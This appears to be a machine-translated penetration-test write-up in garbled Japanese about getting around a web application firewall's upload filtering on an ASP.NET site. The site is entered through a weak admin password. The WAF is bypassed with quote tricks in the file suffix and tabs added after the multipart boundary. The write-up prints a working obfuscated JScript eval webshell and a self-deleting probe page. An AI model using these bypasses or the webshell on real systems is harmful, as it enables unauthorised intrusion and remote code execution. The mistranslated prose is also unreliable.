0x01背景
弱いパスワードがバックグラウンドに入り、ファイルがアップロードされ、wafがある
aaサフィックスが正常にアップロードされたことをテストします。ディスパッチを表示すると、ファイルパスを確認できます
直接アップロードaspxがブロックされました
0x02サフィックス名の検出をバイパス
まず単純に大文字にしてブロックします、ashx、asmx、asp、cerがブロックされます
cshtmlを直接アップロードします。https://www.cnblogs.com/cwkiller/p/12087890.htmlを参照してください
ジャンプ404にアクセスしてください。解決されていないと推定されます
waf接尾辞の検出を直接バイパスしてみてください。簡単なテストの後、二重引用符の後に一重引用符を追加することでバイパスを回避できます。
0x03コンテンツ検出のバイパス
氷サソリに直接、検出コンテンツがwafによって傍受されたことが判明
画像コンテンツをコピーすると、馬が真ん中になり、移動できなくなります。一部のwafが大きくなり、バッグが直接解放される場合があります。機能しない場合は、大きな画像コンテンツをコピーしてもブロックされます。
このステーションは、前のテストインジェクションプロセス中にwafを検出しませんでした。センテンスポスト(非アップロード形式)を直接送信してみてください。インターセプトされません。
wafは、これがContent-Type:multipart / form-dataによるアップロードパッケージであると判断し、コンテンツを確認する必要があります。
そして、アップロードされたコンテンツが基づいている投稿パッケージをwafはどのように解析しますか
Content-Type: multipart/form-data; boundary=---------------------------7e43d3910182
Content-Type境界値--------------------------- 7e43d3910182
それからアイデアが来ます------------------------- 7e43d3910182の後にいくつかのタブキーを追加しますサーバーはアップロードされたコンテンツを正常に解析し、 Wafは
--------------------------- 7e43d3910182TabTabを使用してアップロードされたコンテンツを見つけることができますが、見つかりませんでした。ただそれをテストしなければならない
ビンゴはコンテンツ検出をバイパスしました
0x04ストレンジ404
アップロードに成功しました。最初に馬にアクセスしてください
これは、問題である場合にも当てはまります。馬に直接接続することさえできません。タバコを吸うと、以前にjspステーションが正常にアップロードされたことが記憶されます。これは常に404 https://www.cnblogs.com/cwkiller/p/ 11788009.html
馬のコンテンツ出力が404にならない可能性があり、直接マレーシアに行き、システム許可が正常に接続されます
内容が404ではない馬であるかどうかを確認し、現在時刻のaspxをアップロードして印刷します。
<%@Page Language="C#"%>
<%
Response.Write(DateTime.Now.ToString("yyyy-MM-dd HH:mm:ss"));
System.IO.File.Delete(Request.PhysicalPath);
%>
推測を確認し、Ant Swordがhello、world文を出力するための文を追加しました
<%@ Page Language="Jscript" Debug=true%>
<%
Response.Write("hello,world");
var hw=Request.Form("mr6");
var du='iNUZuDe';
var zu=du.replace("iNUZuD","unsaf");
function RIEo(BWrg)
{eval(BWrg,zu);}
RIEo(hw);
%>
Cookieを持ってくると(このディレクトリ内のファイルにアクセスするにはログインが必要です)、接続は成功します